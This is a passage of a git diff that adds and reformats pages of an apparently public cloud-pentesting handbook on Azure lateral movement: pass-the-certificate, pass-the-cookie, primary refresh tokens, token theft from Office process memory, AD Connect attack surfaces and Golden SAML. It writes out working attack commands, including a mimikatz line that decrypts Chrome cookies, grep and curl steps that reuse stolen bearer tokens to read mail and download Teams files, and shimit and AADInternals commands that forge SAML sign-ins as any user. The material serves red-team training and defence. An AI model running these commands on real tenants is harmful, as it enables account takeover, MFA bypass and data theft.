+- Regularly monitoring and auditing these directories for unauthorized access or unexpected changes.
+- Employing encryption for sensitive files where possible.
+- Educating users about the risks and best practices for handling such sensitive information.
+
+{{#include ../../../banners/hacktricks-training.md}}
diff --git a/src/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-pass-the-certificate.md b/src/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-pass-the-certificate.md
new file mode 100644
index 000000000..54e834822
--- /dev/null
+++ b/src/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-pass-the-certificate.md
@@ -0,0 +1,39 @@
+# Az - Pass the Certificate
+
+{{#include ../../../banners/hacktricks-training.md}}
+
+## Pass the Certificate (Azure)
+
+In Azure joined machines, it's possible to authenticate from one machine to another using certificates that **must be issued by Azure AD CA** for the required user (as the subject) when both machines support the **NegoEx** authentication mechanism.
+
+In super simplified terms:
+
+- The machine (client) initiating the connection **needs a certificate from Azure AD for a user**.
+- Client creates a JSON Web Token (JWT) header containing PRT and other details, sign it using the Derived key (using the session key and the security context) and **sends it to Azure AD**
+- Azure AD verifies the JWT signature using client session key and security context, checks validity of PRT and **responds** with the **certificate**.
+
+In this scenario and after grabbing all the info needed for a [**Pass the PRT**](pass-the-prt.md) attack:
+
+- Username
+- Tenant ID
+- PRT
+- Security context
+- Derived Key
+
+It's possible to **request P2P certificate** for the user with the tool [**PrtToCert**](https://github.com/morRubin/PrtToCert)**:**
+
+```bash
+RequestCert.py [-h] --tenantId TENANTID --prt PRT --userName USERNAME --hexCtx HEXCTX --hexDerivedKey HEXDERIVEDKEY [--passPhrase PASSPHRASE]
+```
+
+The certificates will last the same as the PRT. To use the certificate you can use the python tool [**AzureADJoinedMachinePTC**](https://github.com/morRubin/AzureADJoinedMachinePTC) that will **authenticate** to the remote machine, run **PSEXEC** and **open a CMD** on the victim machine. This will allow us to use Mimikatz again to get the PRT of another user.
+
+```bash
+Main.py [-h] --usercert USERCERT --certpass CERTPASS --remoteip REMOTEIP
+```
+
+## References
+
+- For more details about how Pass the Certificate works check the original post [https://medium.com/@mor2464/azure-ad-pass-the-certificate-d0c5de624597](https://medium.com/@mor2464/azure-ad-pass-the-certificate-d0c5de624597)
+
+{{#include ../../../banners/hacktricks-training.md}}
diff --git a/src/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-pass-the-cookie.md b/src/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-pass-the-cookie.md
new file mode 100644
index 000000000..bf7c5d0d9
--- /dev/null
+++ b/src/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-pass-the-cookie.md
@@ -0,0 +1,37 @@
+# Az - Pass the Cookie
+
+{{#include ../../../banners/hacktricks-training.md}}
+
+## Why Cookies?
+
+Browser **cookies** are a great mechanism to **bypass authentication and MFA**. Because the user has already authenticated in the application, the session **cookie** can just be used to **access data** as that user, without needing to re-authenticate.
+
+You can see where are **browser cookies located** in:
+
+{{#ref}}
+https://book.hacktricks.xyz/generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/browser-artifacts?q=browse#google-chrome
+{{#endref}}
+
+## Attack
+
+The challenging part is that those **cookies are encrypted** for the **user** via the Microsoft Data Protection API (**DPAPI**). This is encrypted using cryptographic [keys tied to the user](https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation/dpapi-extracting-passwords) the cookies belong to. You can find more information about this in:
+
+{{#ref}}
+https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation/dpapi-extracting-passwords
+{{#endref}}
+
+With Mimikatz in hand, I am able to **extract a user’s cookies** even though they are encrypted with this command:
+
+```bash
+mimikatz.exe privilege::debug log "dpapi::chrome /in:%localappdata%\google\chrome\USERDA~1\default\cookies /unprotect" exit
+```
+
+For Azure, we care about the authentication cookies including **`ESTSAUTH`**, **`ESTSAUTHPERSISTENT`**, and **`ESTSAUTHLIGHT`**. Those are there because the user has been active on Azure lately.
+
+Just navigate to login.microsoftonline.com and add the cookie **`ESTSAUTHPERSISTENT`** (generated by “Stay Signed In” option) or **`ESTSAUTH`**. And you will be authenticated.
+
+## References
+
+- [https://stealthbits.com/blog/bypassing-mfa-with-pass-the-cookie/](https://stealthbits.com/blog/bypassing-mfa-with-pass-the-cookie/)
+
+{{#include ../../../banners/hacktricks-training.md}}
diff --git a/src/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-phishing-primary-refresh-token-microsoft-entra.md b/src/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-phishing-primary-refresh-token-microsoft-entra.md
new file mode 100644
index 000000000..8b4cc9e15
--- /dev/null
+++ b/src/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-phishing-primary-refresh-token-microsoft-entra.md
@@ -0,0 +1,7 @@
+# Az - Phishing Primary Refresh Token (Microsoft Entra)
+
+{{#include ../../../banners/hacktricks-training.md}}
+
+**Check:** [**https://dirkjanm.io/phishing-for-microsoft-entra-primary-refresh-tokens/**](https://dirkjanm.io/phishing-for-microsoft-entra-primary-refresh-tokens/)
+
+{{#include ../../../banners/hacktricks-training.md}}
diff --git a/src/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-primary-refresh-token-prt.md b/src/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-primary-refresh-token-prt.md
new file mode 100644
index 000000000..85a1469d3
--- /dev/null
+++ b/src/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-primary-refresh-token-prt.md
@@ -0,0 +1,7 @@
+# Az - Primary Refresh Token (PRT)
+
+{{#include ../../../banners/hacktricks-training.md}}
+
+**Chec the post in** [**https://dirkjanm.io/abusing-azure-ad-sso-with-the-primary-refresh-token/**](https://dirkjanm.io/abusing-azure-ad-sso-with-the-primary-refresh-token/) although another post explaining the same can be found in [**https://posts.specterops.io/requesting-azure-ad-request-tokens-on-azure-ad-joined-machines-for-browser-sso-2b0409caad30**](https://posts.specterops.io/requesting-azure-ad-request-tokens-on-azure-ad-joined-machines-for-browser-sso-2b0409caad30)
+
+{{#include ../../../banners/hacktricks-training.md}}
diff --git a/src/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-processes-memory-access-token.md b/src/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-processes-memory-access-token.md
new file mode 100644
index 000000000..0fb52cfb7
--- /dev/null
+++ b/src/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-processes-memory-access-token.md
@@ -0,0 +1,37 @@
+# Az - Processes Memory Access Token
+
+{{#include ../../../banners/hacktricks-training.md}}
+
+## **Basic Information**
+
+As explained in [**this video**](https://www.youtube.com/watch?v=OHKZkXC4Duw), some Microsoft software synchronized with the cloud (Excel, Teams...) might **store access tokens in clear-text in memory**. So just **dumping** the **memory** of the process and **grepping for JWT tokens** might grant you access over several resources of the victim in the cloud bypassing MFA.
+
+Steps:
+
+1. Dump the excel processes synchronized with in EntraID user with your favourite tool.
+2. Run: `string excel.dmp | grep 'eyJ0'` and find several tokens in the output
+3. Find the tokens that interest you the most and run tools over them:
+
+```bash
+# Check the identity of the token
+curl -s -H "Authorization: Bearer " https://graph.microsoft.com/v1.0/me | jq
+
+# Check the email (you need a token authorized in login.microsoftonline.com)
+curl -s -H "Authorization: Bearer " https://outlook.office.com/api/v2.0/me/messages | jq
+
+# Download a file from Teams
+## You need a token that can access graph.microsoft.com
+## Then, find the  inside the memory and call
+curl -s -H "Authorization: Bearer " https://graph.microsoft.com/v1.0/sites//drives | jq
+
+## Then, list one drive
+curl -s -H "Authorization: Bearer " 'https://graph.microsoft.com/v1.0/sites//drives/' | jq
+
+## Finally, download a file from that drive:
+┌──(magichk㉿black-pearl)-[~]
+└─$ curl -o  -L -H "Authorization: Bearer " '<@microsoft.graph.downloadUrl>'
+```
+
+**Note that these kind of access tokens can be also found inside other processes.**
+
+{{#include ../../../banners/hacktricks-training.md}}
diff --git a/src/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/README.md b/src/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/README.md
new file mode 100644
index 000000000..e241d2c05
--- /dev/null
+++ b/src/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/README.md
@@ -0,0 +1,60 @@
+# Az AD Connect - Hybrid Identity
+
+{{#include ../../../../banners/hacktricks-training.md}}
+
+## Basic Information
+
+Integration between **On-premises Active Directory (AD)** and **Azure AD** is facilitated by **Azure AD Connect**, offering various methods that support **Single Sign-on (SSO)**. Each method, while useful, presents potential security vulnerabilities that could be exploited to compromise cloud or on-premises environments:
+
+- **Pass-Through Authentication (PTA)**:
+  - Possible compromise of the agent on the on-prem AD, allowing validation of user passwords for Azure connections (on-prem to Cloud).
+  - Feasibility of registering a new agent to validate authentications in a new location (Cloud to on-prem).
+
+{{#ref}}
+pta-pass-through-authentication.md
+{{#endref}}
+
+- **Password Hash Sync (PHS)**:
+  - Potential extraction of clear-text passwords of privileged users from the AD, including credentials of a high-privileged, auto-generated AzureAD user.
+
+{{#ref}}
+phs-password-hash-sync.md
+{{#endref}}
+
+- **Federation**:
+  - Theft of the private key used for SAML signing, enabling impersonation of on-prem and cloud identities.
+
+{{#ref}}
+federation.md
+{{#endref}}
+
+- **Seamless SSO:**
+  - Theft of the `AZUREADSSOACC` user's password, used for signing Kerberos silver tickets, allowing impersonation of any cloud user.
+
+{{#ref}}
+seamless-sso.md
+{{#endref}}
+
+- **Cloud Kerberos Trust**:
+  - Possibility of escalating from Global Admin to on-prem Domain Admin by manipulating AzureAD user usernames and SIDs and requesting TGTs from AzureAD.
+
+{{#ref}}
+az-cloud-kerberos-trust.md
+{{#endref}}
+
+- **Default Applications**:
+  - Compromising an Application Administrator account or the on-premise Sync Account allows modification of directory settings, group memberships, user accounts, SharePoint sites, and OneDrive files.
+
+{{#ref}}
+az-default-applications.md
+{{#endref}}
+
+For each integration method, user synchronization is conducted, and an `MSOL_` account is created in the on-prem AD. Notably, both **PHS** and **PTA** methods facilitate **Seamless SSO**, enabling automatic sign-in for Azure AD computers joined to the on-prem domain.
+
+To verify the installation of **Azure AD Connect**, the following PowerShell command, utilizing the **AzureADConnectHealthSync** module (installed by default with Azure AD Connect), can be used:
+
+```powershell
+Get-ADSyncConnector
+```
+
+{{#include ../../../../banners/hacktricks-training.md}}
diff --git a/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/az-cloud-kerberos-trust.md b/src/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/az-cloud-kerberos-trust.md
similarity index 59%
rename from pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/az-cloud-kerberos-trust.md
rename to src/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/az-cloud-kerberos-trust.md
index 6c0e772f8..9263f6668 100644
--- a/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/az-cloud-kerberos-trust.md
+++ b/src/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/az-cloud-kerberos-trust.md
@@ -1,21 +1,8 @@
 # Az - Cloud Kerberos Trust
 
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
+{{#include ../../../../banners/hacktricks-training.md}}
 
-

-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-

-{% endhint %}
-
-**This post is a summary of** [**https://dirkjanm.io/obtaining-domain-admin-from-azure-ad-via-cloud-kerberos-trust/**](https://dirkjanm.io/obtaining-domain-admin-from-azure-ad-via-cloud-kerberos-trust/) **which can be checked for further information about the attack. This technique is also commented in** [**https://www.youtube.com/watch?v=AFay\_58QubY**](https://www.youtube.com/watch?v=AFay_58QubY)**.**
+**This post is a summary of** [**https://dirkjanm.io/obtaining-domain-admin-from-azure-ad-via-cloud-kerberos-trust/**](https://dirkjanm.io/obtaining-domain-admin-from-azure-ad-via-cloud-kerberos-trust/) **which can be checked for further information about the attack. This technique is also commented in** [**https://www.youtube.com/watch?v=AFay_58QubY**](https://www.youtube.com/watch?v=AFay_58QubY)**.**
 
 ## Basic Information
 
@@ -25,9 +12,8 @@ When a trust is stablished with Azure AD, a **Read Only Domain Controller (RODC)
 
 Therefore, if this account is compromised it could be possible to impersonate any user... although this is not true because this account is prevented from creating tickets for any common privileged AD group like Domain Admins, Enterprise Admins, Administrators...
 
-{% hint style="danger" %}
-However, in a real scenario there are going to be privileged users that aren't in those groups. So the **new krbtgt account, if compromised, could be used to impersonate them.**
-{% endhint %}
+> [!CAUTION]
+> However, in a real scenario there are going to be privileged users that aren't in those groups. So the **new krbtgt account, if compromised, could be used to impersonate them.**
 
 ### Kerberos TGT
 
@@ -50,27 +36,14 @@ Note that we can do this with AADInternals and update to synced users via the [S
 
 The success of the attack and attainment of Domain Admin privileges hinge on meeting certain prerequisites:
 
-* The capability to alter accounts via the Synchronization API is crucial. This can be achieved by having the role of Global Admin or possessing an AD Connect sync account. Alternatively, the Hybrid Identity Administrator role would suffice, as it grants the ability to manage AD Connect and establish new sync accounts.
-* Presence of a **hybrid account** is essential. This account must be amenable to modification with the victim account's details and should also be accessible for authentication.
-* Identification of a **target victim account** within Active Directory is a necessity. Although the attack can be executed on any account already synchronized, the Azure AD tenant must not have replicated on-premises security identifiers, necessitating the modification of an unsynchronized account to procure the ticket.
-  * Additionally, this account should possess domain admin equivalent privileges but must not be a member of typical AD administrator groups to avoid the generation of invalid TGTs by the AzureAD RODC.
-  * The most suitable target is the **Active Directory account utilized by the AD Connect Sync service**. This account is not synchronized with Azure AD, leaving its SID as a viable target, and it inherently holds Domain Admin equivalent privileges due to its role in synchronizing password hashes (assuming Password Hash Sync is active). For domains with express installation, this account is prefixed with **MSOL\_**. For other instances, the account can be pinpointed by enumerating all accounts endowed with Directory Replication privileges on the domain object.
+- The capability to alter accounts via the Synchronization API is crucial. This can be achieved by having the role of Global Admin or possessing an AD Connect sync account. Alternatively, the Hybrid Identity Administrator role would suffice, as it grants the ability to manage AD Connect and establish new sync accounts.
+- Presence of a **hybrid account** is essential. This account must be amenable to modification with the victim account's details and should also be accessible for authentication.
+- Identification of a **target victim account** within Active Directory is a necessity. Although the attack can be executed on any account already synchronized, the Azure AD tenant must not have replicated on-premises security identifiers, necessitating the modification of an unsynchronized account to procure the ticket.
+  - Additionally, this account should possess domain admin equivalent privileges but must not be a member of typical AD administrator groups to avoid the generation of invalid TGTs by the AzureAD RODC.
+  - The most suitable target is the **Active Directory account utilized by the AD Connect Sync service**. This account is not synchronized with Azure AD, leaving its SID as a viable target, and it inherently holds Domain Admin equivalent privileges due to its role in synchronizing password hashes (assuming Password Hash Sync is active). For domains with express installation, this account is prefixed with **MSOL\_**. For other instances, the account can be pinpointed by enumerating all accounts endowed with Directory Replication privileges on the domain object.
 
 ### The full attack 
 
 Check it in the original post: [https://dirkjanm.io/obtaining-domain-admin-from-azure-ad-via-cloud-kerberos-trust/](https://dirkjanm.io/obtaining-domain-admin-from-azure-ad-via-cloud-kerberos-trust/)
 
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-

-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-

-{% endhint %}
+{{#include ../../../../banners/hacktricks-training.md}}
diff --git a/src/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/az-default-applications.md b/src/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/az-default-applications.md
new file mode 100644
index 000000000..92176611d
--- /dev/null
+++ b/src/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/az-default-applications.md
@@ -0,0 +1,9 @@
+# Az - Default Applications
+
+{{#include ../../../../banners/hacktricks-training.md}}
+
+**Check the techinque in:** [**https://dirkjanm.io/azure-ad-privilege-escalation-application-admin/**](https://dirkjanm.io/azure-ad-privilege-escalation-application-admin/)**,** [**https://www.youtube.com/watch?v=JEIR5oGCwdg**](https://www.youtube.com/watch?v=JEIR5oGCwdg) and [**https://www.youtube.com/watch?v=xei8lAPitX8**](https://www.youtube.com/watch?v=xei8lAPitX8)
+
+The blog post discusses a privilege escalation vulnerability in Azure AD, allowing Application Admins or compromised On-Premise Sync Accounts to escalate privileges by assigning credentials to applications. The vulnerability, stemming from the "by-design" behavior of Azure AD's handling of applications and service principals, notably affects default Office 365 applications. Although reported, the issue is not considered a vulnerability by Microsoft due to documentation of the admin rights assignment behavior. The post provides detailed technical insights and advises regular reviews of service principal credentials in Azure AD environments. For more detailed information, you can visit the original blog post.
+
+{{#include ../../../../banners/hacktricks-training.md}}
diff --git a/src/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/az-synchronising-new-users.md b/src/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/az-synchronising-new-users.md
new file mode 100644
index 000000000..512fb6dad
--- /dev/null
+++ b/src/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/az-synchronising-new-users.md
@@ -0,0 +1,32 @@
+# Az- Synchronising New Users
+
+{{#include ../../../../banners/hacktricks-training.md}}
+
+## Syncing AzureAD users to on-prem to escalate from on-prem to AzureAD
+
+I order to synchronize a new user f**rom AzureAD to the on-prem AD** these are the requirements:
+
+- The **AzureAD user** needs to have a proxy address (a **mailbox**)
+- License is not required
+- Should **not be already synced**
+
+```powershell
+Get-MsolUser -SerachString admintest | select displayname, lastdirsynctime, proxyaddresses, lastpasswordchangetimestamp | fl
+```
+
+When a user like these is found in AzureAD, in order to **access it from the on-prem AD** you just need to **create a new account** with the **proxyAddress** the SMTP email.
+
+An automatically, this user will be **synced from AzureAD to the on-prem AD user**.
+
+> [!CAUTION]
+> Notice that to perform this attack you **don't need Domain Admin**, you just need permissions to **create new users**.
+>
+> Also, this **won't bypass MFA**.
+>
+> Moreover, this was reported an **account sync is no longer possible for admin accounts**.
+
+## References
+
+- [https://www.youtube.com/watch?v=JEIR5oGCwdg](https://www.youtube.com/watch?v=JEIR5oGCwdg)
+
+{{#include ../../../../banners/hacktricks-training.md}}
diff --git a/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/federation.md b/src/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/federation.md
similarity index 66%
rename from pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/federation.md
rename to src/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/federation.md
index caf83bbd1..8ab63e3a1 100644
--- a/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/federation.md
+++ b/src/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/federation.md
@@ -1,19 +1,6 @@
 # Az - Federation
 
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-

-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-

-{% endhint %}
+{{#include ../../../../banners/hacktricks-training.md}}
 
 ## Basic Information
 
@@ -21,7 +8,7 @@ Learn & practice GCP Hacking: 

+

 
 Bsiacally, in Federation, all **authentication** occurs in the **on-prem** environment and the user experiences SSO across all the trusted environments. Therefore, users can **access** **cloud** applications by using their **on-prem credentials**.
 
@@ -29,13 +16,13 @@ Bsiacally, in Federation, all **authentication** occurs in the **on-prem** envir
 
 In any federation setup there are three parties:
 
-* User or Client
-* Identity Provider (IdP)
-* Service Provider (SP)
+- User or Client
+- Identity Provider (IdP)
+- Service Provider (SP)
 
 (Images from https://www.cyberark.com/resources/threat-research-blog/golden-saml-newly-discovered-attack-technique-forges-authentication-to-cloud-apps)
 
-

+

 
 1. Initially, an application (Service Provider or SP, such as AWS console or vSphere web client) is accessed by a user. This step might be bypassed, leading the client directly to the IdP (Identity Provider) depending on the specific implementation.
 2. Subsequently, the SP identifies the appropriate IdP (e.g., AD FS, Okta) for user authentication. It then crafts a SAML (Security Assertion Markup Language) AuthnRequest and reroutes the client to the chosen IdP.
@@ -44,24 +31,26 @@ In any federation setup there are three parties:
 
 **If you want to learn more about SAML authentication and common attacks go to:**
 
-{% embed url="https://book.hacktricks.xyz/pentesting-web/saml-attacks" %}
+{{#ref}}
+https://book.hacktricks.xyz/pentesting-web/saml-attacks
+{{#endref}}
 
 ## Pivoting
 
-* AD FS is a claims-based identity model.
-* "..claimsaresimplystatements(forexample,name,identity,group), made about users, that are used primarily for authorizing access to claims-based applications located anywhere on the Internet."
-* Claims for a user are written inside the SAML tokens and are then signed to provide confidentiality by the IdP.
-* A user is identified by ImmutableID. It is globally unique and stored in Azure AD.
-* TheImmuatbleIDisstoredon-premasms-DS-ConsistencyGuidforthe user and/or can be derived from the GUID of the user.
-* More info in [https://learn.microsoft.com/en-us/windows-server/identity/ad-fs/technical-reference/the-role-of-claims](https://learn.microsoft.com/en-us/windows-server/identity/ad-fs/technical-reference/the-role-of-claims)
+- AD FS is a claims-based identity model.
+- "..claimsaresimplystatements(forexample,name,identity,group), made about users, that are used primarily for authorizing access to claims-based applications located anywhere on the Internet."
+- Claims for a user are written inside the SAML tokens and are then signed to provide confidentiality by the IdP.
+- A user is identified by ImmutableID. It is globally unique and stored in Azure AD.
+- TheImmuatbleIDisstoredon-premasms-DS-ConsistencyGuidforthe user and/or can be derived from the GUID of the user.
+- More info in [https://learn.microsoft.com/en-us/windows-server/identity/ad-fs/technical-reference/the-role-of-claims](https://learn.microsoft.com/en-us/windows-server/identity/ad-fs/technical-reference/the-role-of-claims)
 
 **Golden SAML attack:**
 
-* In ADFS, SAML Response is signed by a token-signing certificate.
-* If the certificate is compromised, it is possible to authenticate to the Azure AD as ANY user synced to Azure AD!
-* Just like our PTA abuse, password change for a user or MFA won't have any effect because we are forging the authentication response.
-* The certificate can be extracted from the AD FS server with DA privileges and then can be used from any internet connected machine.
-* More info in [https://www.cyberark.com/resources/threat-research-blog/golden-saml-newly-discovered-attack-technique-forges-authentication-to-cloud-apps](https://www.cyberark.com/resources/threat-research-blog/golden-saml-newly-discovered-attack-technique-forges-authentication-to-cloud-apps)
+- In ADFS, SAML Response is signed by a token-signing certificate.
+- If the certificate is compromised, it is possible to authenticate to the Azure AD as ANY user synced to Azure AD!
+- Just like our PTA abuse, password change for a user or MFA won't have any effect because we are forging the authentication response.
+- The certificate can be extracted from the AD FS server with DA privileges and then can be used from any internet connected machine.
+- More info in [https://www.cyberark.com/resources/threat-research-blog/golden-saml-newly-discovered-attack-technique-forges-authentication-to-cloud-apps](https://www.cyberark.com/resources/threat-research-blog/golden-saml-newly-discovered-attack-technique-forges-authentication-to-cloud-apps)
 
 ### Golden SAML
 
@@ -71,26 +60,26 @@ A parallel can be drawn with the [golden ticket attack](https://book.hacktricks.
 
 Golden SAMLs offer certain advantages:
 
-* They can be **created remotely**, without the need to be part of the domain or federation in question.
-* They remain effective even with **Two-Factor Authentication (2FA)** enabled.
-* The token-signing **private key does not automatically renew**.
-* **Changing a user’s password does not invalidate** an already generated SAML.
+- They can be **created remotely**, without the need to be part of the domain or federation in question.
+- They remain effective even with **Two-Factor Authentication (2FA)** enabled.
+- The token-signing **private key does not automatically renew**.
+- **Changing a user’s password does not invalidate** an already generated SAML.
 
 #### AWS + AD FS + Golden SAML
 
-[Active Directory Federation Services (AD FS)](https://docs.microsoft.com/en-us/previous-versions/windows/server-2008/bb897402\(v=msdn.10\)) is a Microsoft service that facilitates the **secure exchange of identity information** between trusted business partners (federation). It essentially allows a domain service to share user identities with other service providers within a federation.
+[Active Directory Federation Services (AD FS)]() is a Microsoft service that facilitates the **secure exchange of identity information** between trusted business partners (federation). It essentially allows a domain service to share user identities with other service providers within a federation.
 
 With AWS trusting the compromised domain (in a federation), this vulnerability can be exploited to potentially **acquire any permissions in the AWS environment**. The attack necessitates the **private key used to sign the SAML objects**, akin to needing the KRBTGT in a golden ticket attack. Access to the AD FS user account is sufficient to obtain this private key.
 
 The requirements for executing a golden SAML attack include:
 
-* **Token-signing private key**
-* **IdP public certificate**
-* **IdP name**
-* **Role name (role to assume)**
-* Domain\username
-* Role session name in AWS
-* Amazon account ID
+- **Token-signing private key**
+- **IdP public certificate**
+- **IdP name**
+- **Role name (role to assume)**
+- Domain\username
+- Role session name in AWS
+- Amazon account ID
 
 _Only the items in bold are mandatory. The others can be filled in as desired._
 
@@ -112,7 +101,6 @@ To acquire the **private key**, access to the **AD FS user account** is necessar
 
 With all the information, it's possible to forget a valid SAMLResponse as the user you want to impersonate using [**shimit**](https://github.com/cyberark/shimit)**:**
 
-{% code overflow="wrap" %}
 ```bash
 # Apply session for AWS cli
 python .\shimit.py -idp http://adfs.lab.local/adfs/services/trust -pk key_file -c cert_file -u domain\admin -n admin@domain.com -r ADFS-admin -r ADFS-monitor -id 123456789012
@@ -127,9 +115,8 @@ python .\shimit.py -idp http://adfs.lab.local/adfs/services/trust -pk key_file -
 # Save SAMLResponse to file
 python .\shimit.py -idp http://adfs.lab.local/adfs/services/trust -pk key_file -c cert_file -u domain\admin -n admin@domain.com -r ADFS-admin -r ADFS-monitor -id 123456789012 -o saml_response.xml
 ```
-{% endcode %}
 
-

+

 
 ### On-prem -> cloud
 
@@ -155,7 +142,7 @@ Open-AADIntOffice365Portal -ImmutableID v1pOC7Pz8kaT6JWtThJKRQ== -Issuer http://
 It's also possible to create ImmutableID of cloud only users and impersonate them
 
 ```powershell
-# Create a realistic ImmutableID and set it for a cloud only user 
+# Create a realistic ImmutableID and set it for a cloud only user
 [System.Convert]::ToBase64String((New-Guid).tobytearray())
 Set-AADIntAzureADObject -CloudAnchor "User_19e466c5-d938-1293-5967-c39488bca87e" -SourceAnchor "aodilmsic30fugCUgHxsnK=="
 
@@ -168,20 +155,7 @@ Open-AADIntOffice365Portal -ImmutableID "aodilmsic30fugCUgHxsnK==" -Issuer http:
 
 ## References
 
-* [https://learn.microsoft.com/en-us/azure/active-directory/hybrid/whatis-fed](https://learn.microsoft.com/en-us/azure/active-directory/hybrid/whatis-fed)
-* [https://www.cyberark.com/resources/threat-research-blog/golden-saml-newly-discovered-attack-technique-forges-authentication-to-cloud-apps](https://www.cyberark.com/resources/threat-research-blog/golden-saml-newly-discovered-attack-technique-forges-authentication-to-cloud-apps)
+- [https://learn.microsoft.com/en-us/azure/active-directory/hybrid/whatis-fed](https://learn.microsoft.com/en-us/azure/active-directory/hybrid/whatis-fed)
+- [https://www.cyberark.com/resources/threat-research-blog/golden-saml-newly-discovered-attack-technique-forges-authentication-to-cloud-apps](https://www.cyberark.com/resources/threat-research-blog/golden-saml-newly-discovered-attack-technique-forges-authentication-to-cloud-apps)
 
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-

-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-

-{% endhint %}
